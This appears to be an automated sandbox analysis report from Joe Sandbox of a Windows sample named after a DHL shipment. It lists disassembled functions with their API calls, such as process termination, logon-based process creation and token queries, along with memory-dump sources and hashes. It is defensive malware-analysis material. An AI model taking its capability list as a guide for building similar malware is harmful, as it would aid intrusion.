Opcode Fuzzy Hash: f170d8e8d9f4c9f2c0ddad038ab0a68d7e1b4730ff62c2b539abe14eb49ad86e
Instruction Fuzzy Hash: E651E635500318BACF24AB65D895B39B3A4FF55314F24846EFA06DF292DBF08C42DB96

Function 0021910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 001A7620: _wcslen.LIBCMT ref: 001A7625

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002194E5
_wcslen.LIBCMT ref: 00219506
_wcslen.LIBCMT ref: 0021952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00219585

Strings

X, xrefs: 00219412

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: f70b691a547ad7173b8ca933b36847a905d7606e56368f5dafaf14c5080c973a
Instruction ID: 6cfef8b9366f007e199a8e81ca586c204172846ceb517d78baa6e2887bb05974
Opcode Fuzzy Hash: f70b691a547ad7173b8ca933b36847a905d7606e56368f5dafaf14c5080c973a
Instruction Fuzzy Hash: 99E1F435518341DFC724DF24C891BAAB7E5BFA5310F04896CF8999B2A2DB30DD85CB92

Function 001B920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

BeginPaint.USER32(?,?,?), ref: 001B9241
GetWindowRect.USER32(?,?), ref: 001B92A5
ScreenToClient.USER32(?,?), ref: 001B92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001B92D3
EndPaint.USER32(?,?,?,?,?), ref: 001B9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001F71EA

Part of subcall function 001B9339: BeginPath.GDI32(00000000), ref: 001B9357

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: b9e0a5633ff83fa2b22bc9b1599d3529db182a42a1b0495ee7b8c4d44c888746
Instruction ID: a148ef96e2ed5ad16d8c036ea1bbd449df27d9e90ae3c3711d513b911068f2c8
Opcode Fuzzy Hash: b9e0a5633ff83fa2b22bc9b1599d3529db182a42a1b0495ee7b8c4d44c888746
Instruction Fuzzy Hash: 6B418D71108201AFD711DF28D889FBA7BB8EF55320F140669FAA8962E1C7319846DB61

Function 002107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0021080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00210847
EnterCriticalSection.KERNEL32(?), ref: 00210863
LeaveCriticalSection.KERNEL32(?), ref: 002108DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002108F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00210921

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: cbc3a00980b3c81e1a54d477b3a7066963cc1f9325f012f5da9864ff15f3d89a
Instruction ID: 8b3c0250f4c6da0d77464c987c7f86c75a444825bddc51c52a94c584bd0d12f2
Opcode Fuzzy Hash: cbc3a00980b3c81e1a54d477b3a7066963cc1f9325f012f5da9864ff15f3d89a
Instruction Fuzzy Hash: 24419A71900205EFDF14AF64DC85AAA77B9FF18700F1140A9ED04AA297DB70DEA1DBA0

Function 002381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001FF3AB,00000000,?,?,00000000,?,001F682C,00000004,00000000,00000000), ref: 0023824C
EnableWindow.USER32(00000000,00000000), ref: 00238272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002382D1
ShowWindow.USER32(00000000,00000004), ref: 002382E5
EnableWindow.USER32(00000000,00000001), ref: 0023830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0023832F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 2860fe9d404a7a3dc8a70f47885f2c4c1b8626b18557ef75f9e9313ba544bfc8
Instruction ID: 9f40ca01f4a2ea67a18838182ddce1d84d3245a25ce652078a4dfa42cde4645e
Opcode Fuzzy Hash: 2860fe9d404a7a3dc8a70f47885f2c4c1b8626b18557ef75f9e9313ba544bfc8
Instruction Fuzzy Hash: 2B41A370611785EFDB15CF15D899BA57BE0BF4A714F1841A9FA084F262CB31A862CF50

Function 00204C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00204C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00204CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00204CEA
_wcslen.LIBCMT ref: 00204D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00204D10
_wcsstr.LIBVCRUNTIME ref: 00204D1A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 603663c332d58e694a8bd20723cbadd2c5eb4b1dcba7b61667bdc092254a8dce
Instruction ID: 48ca78582aea4c8407038eb0c1a3971a595925ad5d4a5ac8673d184570327cda
Opcode Fuzzy Hash: 603663c332d58e694a8bd20723cbadd2c5eb4b1dcba7b61667bdc092254a8dce
Instruction Fuzzy Hash: CE2107B12143017BEB196F35AC4AE7B7BACDF95750F10802EF905DA192DB71DD1187A0

Function 0021581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 001A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A3A97,?,?,001A2E7F,?,?,?,00000000), ref: 001A3AC2

_wcslen.LIBCMT ref: 0021587B
CoInitialize.OLE32(00000000), ref: 00215995
CoCreateInstance.OLE32(0023FCF8,00000000,00000001,0023FB68,?), ref: 002159AE
CoUninitialize.OLE32 ref: 002159CC

Strings

.lnk, xrefs: 00215876, 002158C1, 00215985

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 793fdd3792fed332870078222500fd436634ce9285c72972ef14d90aa5ef720f
Instruction ID: 7f2dd84bac3fc573718fe505e915951c67c39b3c0d2aedda4bc6ca11c548eb2c
Opcode Fuzzy Hash: 793fdd3792fed332870078222500fd436634ce9285c72972ef14d90aa5ef720f
Instruction Fuzzy Hash: 9CD16474618711DFC704DF24C480A6ABBE1EFAA314F14889DF8899B361C731ED85CB92

Function 0020175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00200FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00200FCA
Part of subcall function 00200FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00200FD6
Part of subcall function 00200FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00200FE5
Part of subcall function 00200FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00200FEC
Part of subcall function 00200FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00201002

GetLengthSid.ADVAPI32(?,00000000,00201335), ref: 002017AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002017BA
HeapAlloc.KERNEL32(00000000), ref: 002017C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002017DA
GetProcessHeap.KERNEL32(00000000,00000000,00201335), ref: 002017EE
HeapFree.KERNEL32(00000000), ref: 002017F5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: a668a8e34dd420254058eb13d45e18b4336b1cb1ac398eb5259d5b283557119e
Instruction ID: 97ea7c443f8e8694347ca5e5e7273f165c8139cf2e8049240db62a09f2877553
Opcode Fuzzy Hash: a668a8e34dd420254058eb13d45e18b4336b1cb1ac398eb5259d5b283557119e
Instruction Fuzzy Hash: 0111B131520306FFDB149FA4DC49BAEBBF9EB45355F204018F485A71A2C7359960DB60

Function 002014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002014FF
OpenProcessToken.ADVAPI32(00000000), ref: 00201506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00201515
CloseHandle.KERNEL32(00000004), ref: 00201520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0020154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00201563

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 31e02a43d38e5b4a2ac7a4045561dcd7d32f7eced2e1a933afbcdfe43cb45feb
Instruction ID: ecb35c6c659aedf01a1fb3f60251a9546fe93f991d23821d43b5cc1a7fdbd5b3
Opcode Fuzzy Hash: 31e02a43d38e5b4a2ac7a4045561dcd7d32f7eced2e1a933afbcdfe43cb45feb
Instruction Fuzzy Hash: A511267260024AABDF119FA8ED49BDE7BA9EF48748F144065FA05A20A1C375CE74DB60

Function 001C3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001C3379,001C2FE5), ref: 001C3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001C339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001C33B7
SetLastError.KERNEL32(00000000,?,001C3379,001C2FE5), ref: 001C3409

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 355d26810112549784b1dbea45c4fe83dfa30d71b9209d8198d0826ee21b9d94
Instruction ID: 9f5eb09257ca458df6d69e03d8cba2abf97df551e44580b7680aebe58a3fe4f1
Opcode Fuzzy Hash: 355d26810112549784b1dbea45c4fe83dfa30d71b9209d8198d0826ee21b9d94
Instruction Fuzzy Hash: 2A01B13260D361AEA62937757CD9F762A94EB35379730C22EF430852F0EF51CE015694

Function 001D2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001D5686,001E3CD6,?,00000000,?,001D5B6A,?,?,?,?,?,001CE6D1,?,00268A48), ref: 001D2D78
_free.LIBCMT ref: 001D2DAB
_free.LIBCMT ref: 001D2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,001CE6D1,?,00268A48,00000010,001A4F4A,?,?,00000000,001E3CD6), ref: 001D2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,001CE6D1,?,00268A48,00000010,001A4F4A,?,?,00000000,001E3CD6), ref: 001D2DEC
_abort.LIBCMT ref: 001D2DF2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 9be319964bf72c46c1746ff65fcdb335a636423f68970dddb56c5f110d5f52af
Instruction ID: 99f5beaa3c54c1e4e813fd05a8d0d3fac11d530cad54f87fdc002538f222e3ac
Opcode Fuzzy Hash: 9be319964bf72c46c1746ff65fcdb335a636423f68970dddb56c5f110d5f52af
Instruction Fuzzy Hash: B8F0A431905E106BC62637B8BC0AA1B255BABF27A5F35442BF878A3392EF7488015261

Function 00238A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 001B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001B9693
Part of subcall function 001B9639: SelectObject.GDI32(?,00000000), ref: 001B96A2
Part of subcall function 001B9639: BeginPath.GDI32(?), ref: 001B96B9
Part of subcall function 001B9639: SelectObject.GDI32(?,00000000), ref: 001B96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00238A4E
LineTo.GDI32(?,00000003,00000000), ref: 00238A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00238A70
LineTo.GDI32(?,00000000,00000003), ref: 00238A80
EndPath.GDI32(?), ref: 00238A90
StrokePath.GDI32(?), ref: 00238AA0

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 40d2075359e2f970bbc8a46a1094f9e1ffe57da8dd69308a220a3233148723fd
Instruction ID: 08df1aa3a9238a59418e1df45bec60a5ec0def05086497701a32004d9be46465
Opcode Fuzzy Hash: 40d2075359e2f970bbc8a46a1094f9e1ffe57da8dd69308a220a3233148723fd
Instruction Fuzzy Hash: 8111C97600014DFFDB129F94EC88EAA7F6DEF08354F148012BA19AA1A1C7719D65DBA0

Function 002051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00205218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00205229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00205230
ReleaseDC.USER32(00000000,00000000), ref: 00205238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0020524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00205261

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: aa414dd039dcc264e3bed95421932c39f3ec9bf6be24d8012575791920565cfe
Instruction ID: f83e28993972d8d120e52b77d4302a81ce707673d44f944d75f52265ec876a69
Opcode Fuzzy Hash: aa414dd039dcc264e3bed95421932c39f3ec9bf6be24d8012575791920565cfe
Instruction Fuzzy Hash: 81014F76A00719BBEB109FA59C49A5EBFB8EF48751F144065FA04E7291D670DC10CFA0

Function 001A1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 001A1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 001A1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 001A1C22

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b5f73e75d3f4d159d184f7b92c1e177da4853d55127f04bb14510640d72b7104
Instruction ID: 02a9bab16ae7b07eaf9d8968e5e300c4a5aec55a88e8083258c16dd6c42c3943
Opcode Fuzzy Hash: b5f73e75d3f4d159d184f7b92c1e177da4853d55127f04bb14510640d72b7104
Instruction Fuzzy Hash: E20144B0902B5ABDE3008F6A8C85A52FEA8FF59354F00411BA15C4BA42C7B5A864CBE5

Function 0020EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0020EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0020EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0020EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0020EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0020EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0020EB75

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 902fb6af279bf8771525b237c17e805e5dcc1ca38a46c8cbaec3632c3decc720
Instruction ID: 1c97c87dda4c8f16d15645cb4b1a3096a7b9fe22736711dabff8f0e1dea69905
Opcode Fuzzy Hash: 902fb6af279bf8771525b237c17e805e5dcc1ca38a46c8cbaec3632c3decc720
Instruction Fuzzy Hash: 22F03A72240158BBE7215B62AC0EEEF3A7CEFCAB11F104158F601E1091D7A05A01DBB5

Function 001F7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 001F7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 001F7469
GetWindowDC.USER32(?), ref: 001F7475
GetPixel.GDI32(00000000,?,?), ref: 001F7484
ReleaseDC.USER32(?,00000000), ref: 001F7496
GetSysColor.USER32(00000005), ref: 001F74B0

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 507645956b861a7ca1293f780527880e8a44994efbe2428a66b30f923adc6731
Instruction ID: 6a8833beac387f2cad7f834847cd783420f5843c6f94fbeda15d613c70c2e6f9
Opcode Fuzzy Hash: 507645956b861a7ca1293f780527880e8a44994efbe2428a66b30f923adc6731
Instruction Fuzzy Hash: 1E014B31500619EFEB515F64EC0DBBA7BB5FF04311F650164FA19B21A1CB311E51AF50

Function 00201874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0020187F
UnloadUserProfile.USERENV(?,?), ref: 0020188B
CloseHandle.KERNEL32(?), ref: 00201894
CloseHandle.KERNEL32(?), ref: 0020189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002018A5
HeapFree.KERNEL32(00000000), ref: 002018AC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
